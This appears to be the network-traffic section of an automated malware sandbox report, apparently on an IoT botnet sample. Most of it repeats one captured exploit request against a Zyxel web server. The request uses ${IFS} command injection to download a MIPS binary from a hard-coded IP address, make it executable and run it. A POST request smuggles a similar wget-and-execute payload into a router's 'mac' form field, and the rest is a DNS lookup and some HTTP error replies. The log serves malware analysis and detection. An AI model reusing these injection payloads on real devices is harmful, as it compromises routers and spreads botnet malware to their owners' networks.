          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: unknownDNS traffic detected: queries for: haha.skyljne.click
          Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48Strict-Transport-Security: max-age=604800; includeSubDomainsX-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: keep-aliveCache-control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Jan 2024 15:55:46 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 685X-Iinfo: 14-3155978-0 0NNN RT(1705243881224 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 34 2d 33 31 35 35 39 37 38 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 32 34 33 38 38 31 32 32 34 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 32 36 35 39 37 39 34 31 33 31 36 32 34 35 39 30 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 32 36 35 39 37 39 34 31 33 31 36 32 34 35 39 30 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=14-3155978-0%200NNN%20RT%281705243881224%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-12659794131624590&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-12659794131624590</iframe></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
